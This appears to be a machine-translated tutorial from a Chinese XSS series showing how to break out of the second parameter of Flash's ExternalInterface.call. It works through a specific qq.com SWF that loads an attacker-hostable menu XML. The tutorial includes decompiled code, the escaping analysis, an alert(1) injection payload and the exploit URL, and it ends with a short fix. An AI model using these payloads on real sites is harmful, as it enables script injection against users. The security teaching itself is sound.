In those years, we will learn XSS-16. Flash Xss advanced [ExternalInterface. call second parameter]

ExternalInterface. the first parameter of the call, we will talk about the "2" parameter next, the reason why the quotation marks 2, because the prototype of the call function is: call (functionName: String ,... arguments): *, which can be followed by many parameters, which are collectively referred to as 2nd parameters. Sometimes we may encounter ExternalInterface. call ("xxxxx", "controllable content");. In this case, how to construct XSS?
1. With the foundation of the previous tutorial, we can see the example directly this time. GOOGLE Search: site: qq.com filetype: swf inurl: xml we can find the following FLASH. Http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf? Xml_path = http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml 2. For more information, see http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml Content. 3. It seems that it cannot be used. We decompile FLASH files. 4. Let's see if there are getURL, ExternalInterface. call, and so on. We can see that we found the following sentence: flash. external. externalInterface. call ("custom_menu_swf", menu_array [_ local2]. href); then the first parameter of the call is limited to dead ~, The 2nd parameters are menu_array [_ local2]. href. If you know a little about AS, it is not difficult to see that menu_array is an array, then _ local2 should be the subscript of the array, from the meaning of the word "menu array", we can hardly think of the data in the above xml file. 5. In other words, here we can control the 2nd parameters of call. The method in tutorial 14 is downloaded. http://imgcache.qq.com/qzone/client/custom_menu/custom_menu.xml . First, click Modify and upload it to your website. We can change the href of the line in the log in the code. <Menu name = "log" href = "\ & quot;, alert (1)"/> upload the modified file and remember to upload the crossdomain. upload xml files to the root directory of your website ~~ (See tutorial 14) 6. Load the XML file we specified. http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml 7. Open the Firefox browser. Someone will ask, why did you suddenly use Firefox! Crazy !! Comrades, I'm not crazy, just because FF can capture the error here, But chrome cannot! After we open Firefox, visit the above address and click the log button !! Ctrl + shift + J open the error console! The following error is displayed! 8. A friend with good memory will immediately remember what we mentioned in the previous section. ExternalInterface. call ("function name", "parameter 1"); actually, the following content is executed: try {_ flash _ toXML (function name ("parameter 1 "));} catch (e) {"<undefined/>";} we caught the error here from FF! (:) Of course there will be other methods ). Why? Let's take a look. 9. It is called when you click log. Flash. external. externalInterface. call ("custom_menu_swf", menu_array [_ local2]. href); While menu_array [_ local2]. href is equal to \ ", alert (1). Then, we enter the complete code as follows: try {_ flash _ toXML (custom_menu_swf ("\\", alert (1) ");} catch (e) {" <undefined/> ";} the conversion process is as follows: after the conversion, JavaScript code is messy and quotation marks are everywhere, brackets are nowhere to find, so an error is reported! 10. How can we construct the correct code to use it? In fact, it is not difficult to have the knowledge of the previous section! Try {_ flash _ toXML (custom_menu_swf ("constructor point");} catch (e) {"<undefined/>";} first step, to inject your own code, you must first close the double quotation marks! Try {_ flash _ toXML (custom_menu_swf ("constructor"), alert ("constructor");} catch (e) {"<undefined/> ";} but from the above conversion process, we can see that "will become \", that is, it will become the following, or it will not break through. Try {_ flash _ toXML (custom_menu_swf ("constructor \"), alert (\ "constructor");} catch (e) {"<undefined/>";} fortunately, \ is not escaped here. We can construct it by inputting. In the JS string, \ is represented. Try {_ flash _ toXML (custom_menu_swf ("constructor \")} catch (e) {alert (1 )} // constructor ");} catch (e) {" <undefined/> ";} Image Analysis: 11. after reading so much code, Let's take out the Construction Code and insert it into the XML file. Note the following: 11.1 The final constructed code is \ ". Our actual input is \", which is then changed from FLASH, therefore, you only need to enter \ "in the code. 11.2 because in the XML node attributes, double quotation marks are written as & quot; <menu name = "log" href = "constructor \ & quot;)} catch (e) {alert (1)} // constructor "/> 12. upload the file again. Open http://imgcache.qq.com/qzone_v4/2/default_menu_horizontal.swf?xml_path=http://itsokla.duapp.com/custom_menu.xml Click Log to see the effect.

Solution:

1. Escape the \ before passing in the call 2nd parameters. 2. Do not call third-party external XML files.